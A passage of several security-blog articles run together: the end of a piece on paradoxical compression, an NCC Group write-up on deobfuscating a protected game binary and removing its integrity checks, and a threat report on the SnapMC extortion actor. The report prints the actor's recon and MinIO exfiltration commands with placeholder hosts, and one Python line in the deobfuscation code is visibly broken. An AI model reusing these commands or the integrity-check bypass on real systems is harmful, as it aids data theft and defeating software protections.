In the context of paradoxical compression, the pigeonhole principle basically means that there must exist a “problematic input” x that breaks one of the alleged properties: either C(x) is larger than x, or decompression of C(x) does not yield x back, or the compression or decompression algorithm fails to terminate.

Achieving Paradoxical Compression

Since we know that paradoxical compression is impossible, achieving it nonetheless is going to require some creativity. In other words, we will “cheat”. The conceptual trick here is the following: there exist some “problematic inputs”, but there are not necessarily many of them. Maybe we can arrange for them to be hard to find? In essence, we are moving the target: we won’t make an algorithm that can be proven to always work, but we might make one such that nobody can find a problematic input (even though everybody knows that these problematic inputs necessarily exist).

This is where the gist of the trick lies: there is an existence proof for problematic inputs, but this is not a constructive proof since it only demonstrates that such inputs must exist; it does not reveal them. In the world of mathematics, existence proofs are enough to conclude; but in the world of computers, which operate under finite resources, constructive proofs do not automatically follow. Most of cryptography strives in the gap between existence and constructive proofs. For instance, given a strong, cryptographically secure hash function such as SHA-256, we perfectly know that collisions must exist (the SHA-256 input space is vastly larger than the SHA-256 output space, so the SHA-256 function cannot be injective), but nobody ever managed to find one. We can even describe algorithms that will produce collisions if executed, but at a computational cost that far exceeds our available resources, so we cannot do that in practice.

In the case of paradoxical compression, the construction can be described as successive improvements. Let’s start with a “normal” compression algorithm such as DEFLATE (the core algorithm in the GZip and Zlib formats, also used in traditional Zip archives). This algorithm can reduce the size of some sequences of bits, in particular structured data commonly encountered in practical applications. However, for most possible inputs (e.g. output of a random generator), it will slightly increase the size. We want to fix that. A simple method is the following:

  • Compression: if DEFLATE(x) is shorter than x, then return DEFLATE(x). Otherwise, return x.
  • Decompression: if y can be inflated into x, then return x. Otherwise, return y.

This method assumes that a “compressed output” can be unambiguously distinguished from any other sequence of bits. This is, of course, not true, and it is easy to make this algorithm fail by applying the compressor on its own output: for a given x, C(x) is usually not itself compressible (after all, DEFLATE does a good job at removing the redundancies that DEFLATE itself leverages), so that C(C(x)) will return C(x) itself. Then, decompression of C(C(x)) will return x instead of C(x). C(x) is then a “problematic input” since it does not survive a compression-decompression cycle.

Now, we can handle that case by adjoining a counter in some sort of header. Compressed outputs will start with a counter of 0. If the input to the compression algorithm is already a compressed output, we’ll just increase the counter; the counter is really the number of nested invocations of the compression algorithm. This leads to the following:

  • Compression of x:
    • If DEFLATE(x) is shorter than x with some extra room for our counter (say, a 32-bit counter), then return DEFLATE(x) || 0.
    • Otherwise, if the input is itself x = DEFLATE(x’) || c for some input x’ and counter c, then return DEFLATE(x’) || c+1.
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 for some x, then return x.
    • Otherwise, if y = DEFLATE(x) || c from some input x and counter c > 0, then return DEFLATE(x) || c-1.
    • Otherwise, return y.

Does this work? Mostly. If you implement it and try it on some examples, including by trying to compress a compression output, then this seems to work. However, the problematic inputs are not unreachable. It can be shown that the above necessarily works except in a single place, which is the computation of c+1 in the second compression case: since the counter slot has a given fixed length, it may overflow. For instance, if the counter is a 32-bit integer, and c happens to be equal to 232-1, then c+1 does not fit. The compression algorithm would typically truncate the value to its low 32 bits, yielding 0, and decompression would not return the proper bit sequence. In other words, the “problematic inputs” are exactly the values DEFLATE(x) || 0xFFFFFFFF. You might take solace in the idea that it is unlikely that such an input occurs in practical, non-adversarial situations, but they are still easy enough to build. Thus, this is not good enough for us. We want a construction that cannot be broken even when actively trying to find a problematic input.

Note, though, that building a problematic input by compressing the output repeatedly is very inefficient; with a 32-bit counter, it takes more than 4 billions of recursive calls. Of course, if you want to make a problematic input on purpose, you don’t do that; you directly set the counter to the all-ones value. But what if you can’t?

Let’s now suppose that the compression and decompression algorithms are really compression and decompression systems that can be invoked, but which are opaque to attackers (this is called the “blackbox model”). In that case, we may imagine that the compressor somehow signs its outputs, so that attackers who want to make a problematic input cannot directly set the counter to the all-ones value; if the attacker must use the compression system to increase the counter, then reaching a counter overflow would require an inordinately large number of invocations. If the counter is large enough (e.g. 64 bits or more), then the compression system cannot do that in any practical time. This leads us to the following construction:

  • The compression and decompression system are assumed to share a secret key K. That key is used in a message authentication code (MAC). The MAC is supposed to be stateless, deterministic and unforgeable; in practice, consider it to be HMAC/SHA-256, possibly with an output truncated to 128 bits.
  • Compression of x:
    • If DEFLATE(x) is shorter than x by at least 64+128 = 192 bits, then return DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) (i.e. the concatenation of DEFLATE(x), the counter value 0 over 64 bits, and a 128-bit MAC computed over these two elements).
    • Otherwise, if the input is x = DEFLATE(x’) || c || MAC(DEFLATE(x’) || c) for some input x’ and counter c, then return DEFLATE(x’) || c+1 || MAC(DEFLATE(x’) || c+1).
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) for some input x, then return x.
    • Otherwise, if y = DEFLATE(x) || c || MAC(DEFLATE(x) || c) for some input x and counter c > 0, then return DEFLATE(x) || c-1 || MAC(DEFLATE(x) || c-1).
    • Otherwise, return y.

This construction achieves paradoxical construction because the problematic inputs (with counter c close to overflow) can be obtained only from the compression system itself (since we assume the MAC to be unforgeable), and the compression system produces new counter values only in minimal increments; getting a problematic input then requires too many (264 in this example) invocations of the compression system to be done in practice. If problematic inputs cannot be built, we win: nobody can make our compression/decompression system fail.

Removing the Shared Key Requirement

The construction above uses a MAC that relies on a shared secret value (the MAC key) between the compression and decompression systems. This is a restrictive model and we would like to remove this requirement. Can we build the same system, but in a keyless fashion?

We can, with a verifiable delay function (VDF). Such functions have been recently defined. In a nutshell, a VDF is a sort of hash function that takes a configurable time to compute (with no known shortcut) but also comes with a proof of correct computation, and the proof can be verified at a low computational cost. This is an extension of earlier time-lock puzzles. One can think of a VDF as a time-lock puzzle that can be verified to have been properly set.

In our paradoxical compression system described above, we used a MAC with a secret key in order to prevent outsiders from building problematic inputs. We can replace the MAC with a VDF, using the counter itself as work factor: an input with a very high counter value cannot be built in practice because that would mean a very high work factor: the secrecy of the key is replaced with a “computational wall” of the VDF becoming too expensive the compute for high counter values.

I implemented this method, using a VDF designed by Wesolowski. It is based on computing squarings modulo a big composite integer (i.e. an RSA modulus): raising an input x to the power 2c modulo n is postulated to require c successive squarings modulo n, with no known “shortcut” if the factorization of n is not known. Wesolowski’s VDF comes with a compact proof of correct construction, that can be efficiently verified. The implementation is in C# (mostly because C# has a DEFLATE implementation in its standard library, and I already had some C# implementation of the SHA3/SHAKE hash functions, and of big integers with primality tests). The 2048-bit modulus was generated as a random RSA key (I discarded the prime factors; now nobody knows them). The code can be obtained on GitHub.

The code is open-source and you may reuse it as you will (under the MIT license), but of course achieving paradoxical compression is not, in fact, a very useful property: it does not solve any real, practical problem. However, it is an enjoyable party trick.

A Look At Some Real-World Obfuscation Techniques

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed, by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT(Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to canonical C++ language’s internal initialization functions such as _initterm() and _initterm_e.

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory):
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed but smoothen the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and send the execution into a stack-mangling loop before continuing execution which is leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300AA == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is not set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether one or more byte should be read to compute the final value.

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator implemented in Python below was verified to produce the same digest, as when running under the debugger, or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

SnapMC skips ransomware, steals data

Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations.

Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses.

Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. SnapMC however has shown itself capable of actual data breach attacks. The extortion emails we have seen from SnapMC give victims 24 hours to get in contact and 72 hours to negotiate. Even so, we have seen this actor start increasing the pressure well before countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets.

Modus operandi

Initial access

At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:

  • Remote code execution in Telerik UI for ASPX.NET [1]
  • SQL injections

After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2].

Directly afterwards PowerShell is started to perform some standard reconnaissance activity:

  • whoami
  • whoami /priv
  • wmic logicaldisk get caption,description,providername
  • net users /priv

Note that in the last command the adversary used the /priv option, which is not a valid option for the net users command.

Privilege Escalation

In most of the cases we analyzed the threat actor did not perform privilege escalation. However in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:

  • Invoke-Nightmare [3]
  • Invoke-JuicyPotato [4]
  • Invoke-ServiceAbuse [4]
  • Invoke-EventVwrBypass [6]
  • Invoke-PrivescAudit [7]

Collection & Exfiltration

We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:

  • C:\Windows\Temp\
  • C:\Windows\Temp\Azure
  • C:\Windows\Temp\Vmware

SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility.

The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio.

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET>

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY>

Mitigations

First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective way to prevent falling victim to these types attacks. [CB1] Make sure to identify where vulnerable software resides within your network by (regularly performing) vulnerability scanning. Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization, and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident. Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became clear that when the software component resided behind a well configured Web Application Firewall (WAF), the exploit would be unsuccessful. Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection, and efficient response will reduce the damage even before it materializes.

Conclusion

NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware. While in the data breach extortion attacks, most of the activity could even be automated and takes less time while still having a significant impact. Therefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.

MITRE ATT&CK mapping

Tactic Technique Procedure
Reconnaissance T1595.002 – Vulnerability scanning SnapMC used the Acunetix vulnerability scanner to find systems running vulnerable Telerik software.
Initial Access T1190 – Exploit Public Facing Application(s) SnapMC exploited CVE-2019-18935 and SQL Injection.
Privilege Escalation   SnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.
Execution T1059.001 – PowerShell SnapMC used a combination of publicly available PowerShell cmdlets.
Collection T1560.001 – Archive via Utility SnapMC used 7zip to prepare data for exfiltration.
Exfiltration T1567 – Exfiltration over Web Service T1567.002 – Exfiltration to Cloud Storage SnapMC used MinIO client (mc.exe) to exfiltrate data.

Indicators of Compromise

Type Data Notes
File location + file name C:\Windows\Temp\[0-9]{10}.[0-9]{1,8}.dll (example: c:\Windows\Temp\1628862598.87034184.dll) File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and last part is randomly generated
File location + file name C:\Windows\Temp\7za.exe 7zip archiving utility
File name s.ps1 SQL cmdlet
File name a.ps1 SQL cmdlet
File name x.ps1 SQL cmdlet
File name *.par.minio Temporary files created by MinIO during exfiltration
File location C:\Windows\Temp\Azure\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Azure\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Vmware\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Vmware\ Folder for temporary files created by MinIO
File name mc.exe MinIO client
Hash 651ed548d2e04881d0ff24f789767c0e Md5 hash of MinIO client
Hash b4171d48df233978f8cf58081b8ad9dc51a6097f Sha1 hash of MinIO client
Hash 0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e Sha256 hash of MinIO client

References

[1] – https://nvd.nist.gov/vuln/detail/CVE-2019-18935

[2] – https://github.com/noperator/CVE-2019-18935

[3] – https://github.com/calebstewart/CVE-2021-1675

[4] – https://github.com/d0nkeys/redteam/tree/master/privilege-escalation

[5] – https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/

[6] – https://github.com/gushmazuko/WinBypass

[7] – https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-PrivescAudit/

